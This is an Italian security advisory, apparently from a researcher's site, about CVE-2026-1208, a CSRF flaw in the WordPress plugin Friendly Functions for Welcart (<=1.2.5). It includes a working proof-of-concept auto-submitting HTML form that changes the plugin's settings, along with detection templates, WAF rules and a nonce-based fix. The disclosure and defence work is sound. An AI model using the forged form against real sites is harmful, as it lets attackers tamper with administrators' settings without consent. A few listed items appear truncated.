
Friendly Functions for Welcart <= 1.2.5 - Cross-Site Request Forgery per Aggiornamento Impostazioni
Parole chiave: CVE-2026-1208, vulnerabilità Friendly Functions for Welcart, CSRF, Cross-Site Request Forgery, sicurezza WordPress, vulnerabilità plugin WordPress, CWE-352, sicurezza Welcart, manipolazione impostazioni, WordPress CVE 2026
Vulnerabilità CSRF nel plugin WordPress Friendly Functions for Welcart (CVE-2026-1208) - Falla di sicurezza che consente ad attaccanti non autenticati di modificare le impostazioni del plugin tramite richieste contraffatte.
È stata scoperta una vulnerabilità di Cross-Site Request Forgery (CSRF) nel plugin Friendly Functions for Welcart che permette ad attaccanti non autenticati di aggiornare le impostazioni del plugin ingannando un amministratore affinché clicchi su un link malevolo.
Scoperta da: Kai Aizen (SnailSploit)
Pubblicata: 23 gennaio 2026
Punteggio CVSS: 4.3 (Medio)
CWE: CWE-352 - Cross-Site Request Forgery (CSRF)
Plugin: Friendly Functions for Welcart
Tipo di attacco: Cross-Site Request Forgery per aggiornamento impostazioni
Privilegi richiesti: Nessuno (Attacco non autenticato + Ingegneria sociale)
Il plugin Friendly Functions for Welcart per WordPress è vulnerabile a Cross-Site Request Forgery in tutte le versioni fino alla 1.2.5 inclusa. Ciò è dovuto alla mancanza o all'errata validazione del nonce nella pagina delle impostazioni. Questo permette ad attaccanti non autenticati di aggiornare le impostazioni del plugin tramite una richiesta contraffatta, a condizione che riescano a indurre un amministratore del sito a compiere un'azione come cliccare su un link.
Questa vulnerabilità consente ad attaccanti non autenticati di:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
La vulnerabilità risiede nell'implementazione della pagina delle impostazioni dove:
La vulnerabilità è stata identificata nelle seguenti posizioni:
ffw_function_settings.php - Riga 53ffw_function_settings.php - Riga 58L'attacco richiede ingegneria sociale per indurre un amministratore autenticato a visitare una pagina malevola o a cliccare su un link appositamente costruito mentre è loggato nel proprio sito WordPress.
Target: Amministratore WordPress con Friendly Functions for Welcart installato
Metodo: Pagina HTML malevola con modulo auto-inviante
Trigger: L'amministratore clicca su un link o visita una pagina controllata dall'attaccante
<!DOCTYPE html>
<html>
<head>
<title>CVE-2026-1208 - PoC CSRF</title>
</head>
<body>
<h1>Caricamento in corso...</h1>
<form id="csrf-form" action="https://TARGET_SITE/wp-admin/admin.php?page=ffw-settings" method="POST">
<input type="hidden" name="ffw_setting_option" value="valore_malevolo" />
<!-- Aggiungere ulteriori campi delle impostazioni secondo necessità -->
</form>
<script>
document.getElementById('csrf-form').submit();
</script>
</body>
</html>
⚠️ Avvertenza: Questo PoC è fornito esclusivamente a scopo educativo e per test autorizzati.
# Verificare se è installata una versione vulnerabile
wp plugin list | grep -i "friendly-functions-for-welcart"
# Ottenere la versione specifica
wp plugin get friendly-functions-for-welcart --field=version
Template Nuclei:
id: CVE-2026-1208
info:
name: Friendly Functions for Welcart - CSRF per aggiornamento impostazioni
author: SnailSploit
severity: medium
description: |
Il plugin Friendly Functions for Welcart per WordPress è vulnerabile
a CSRF nelle versioni <= 1.2.5 a causa della mancanza di validazione del nonce.
reference:
- https://github.com/SnailSploit/CVE-2026-1208
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/friendly-functions-for-welcart/friendly-functions-for-welcart-125-cross-site-request-forgery-to-settings-update
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
cvss-score: 4.3
cve-id: CVE-2026-1208
cwe-id: CWE-352
tags: cve,cve2026,wordpress,wp-plugin,csrf,welcart
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/friendly-functions-for-welcart/readme.txt"
matchers-condition: and
matchers:
- type: word
words:
- "Friendly Functions for Welcart"
- type: regex
regex:
- "(?i)Stable tag:\\s*(1\\.([0-1]\\.[0-9]|2\\.[0-5]))"
- type: status
status:
- 200
extractors:
- type: regex
name: version
group: 1
regex:
- "(?i)Stable tag:\\s*([0-9.]+)"
Regola ModSecurity:
# CVE-2026-1208 - Blocca tentativi CSFR verso le impostazioni FFW
SecRule REQUEST_URI "@contains /wp-admin/admin.php" \
"chain,id:2026001,phase:2,t:none,t:urlDecodeUni,\
log,deny,status:403,msg:'CVE-2026-1208 Tentativo CSRF Bloccato'"
SecRule ARGS:page "@streq ffw-settings" \
"chain"
SecRule &REQUEST_HEADERS:Referer "@eq 0"
# Alternativa: Blocca se il referer non corrisponde al dominio del sito
SecRule REQUEST_URI "@contains /wp-admin/admin.php" \
"chain,id:2026002,phase:2,t:none,\
log,deny,status:403,msg:'CVE-2026-1208 Richiesta Cross-Origin Bloccata'"
SecRule ARGS:page "@streq ffw-settings" \
"chain"
SecRule REQUEST_HEADERS:Referer "!@contains yourdomain.com"
Regola Nginx:
# CVE-2026-1208 - Protezione CSRF per impostazioni FFW
location /wp-admin/admin.php {
# Controlla la pagina ffw-settings senza referer appropriato
if ($arg_page = "ffw-settings") {
set $csrf_check "1";
}
if ($http_referer !~ "^https?://(www\.)?yourdomain\.com") {
set $csrf_check "${csrf_check}1";
}
if ($csrf_check = "11") {
return 403;
}
# Passa al gestore PHP
try_files $uri =404;
fastcgi_pass php-fpm;
include fastcgi_params;
}
Azione Immediata Richiesta:
Assicurarsi che tutti i moduli delle impostazioni implementino una corretta protezione CSRF:
// Esempio di corretta protezione CSRF in WordPress
// Nel modulo:
wp_nonce_field('ffw_settings_update', 'ffw_settings_nonce');
// Nel gestore del modulo:
function process_settings_update() {
// Verifica nonce
if (!isset($_POST['ffw_settings_nonce']) ||
!wp_verify_nonce($_POST['ffw_settings_nonce'], 'ffw_settings_update')) {
wp_die('Controllo di sicurezza fallito');
}
// Controlla i permessi
if (!current_user_can('manage_options')) {
wp_die('Non autorizzato');
}
// Elabora l'aggiornamento delle impostazioni
// ...
}
Ricercatore:
Processo di Divulgazione: Coordinato tramite il Programma Bug Bounty di Wordfence
Queste informazioni sono fornite esclusivamente a scopo di ricerca sulla sicurezza e difesa. Qualsiasi sfruttamento di questa vulnerabilità per scopi malevoli è illegale e non etico. Ottenere sempre la dovuta autorizzazione prima di testare sistemi che non si possiedono.
Per domande o informazioni aggiuntive su questa vulnerabilità:
Ultimo aggiornamento: 23 gennaio 2026
La documentazione completa di questo progetto, la metodologia e la ricerca correlata sono disponibili su:
https://snailsploit.com/security-research/cves/cve-2026-1208/
Creato da Kai Aizen — ricercatore indipendente di sicurezza offensiva.
snailsploit.com · Ricerca · Framework · GitHub · LinkedIn · ResearchGate · X/Twitter
Stesso attacco. Substrato diverso.
| Metrica | Valore |
|---|
| Vettore d'Attacco | Rete (AV:N) |
| Complessità dell'Attacco | Bassa (AC:L) |
| Privilegi Richiesti | Nessuno (PR:N) |
| Interazione dell'Utente | Richiesta (UI:R) |
| Ambito | Invariato (S:U) |
| Riservatezza | Nessuna (C:N) |
| Integrità | Bassa (I:L) |
| Disponibilità | Nessuna (A:N) |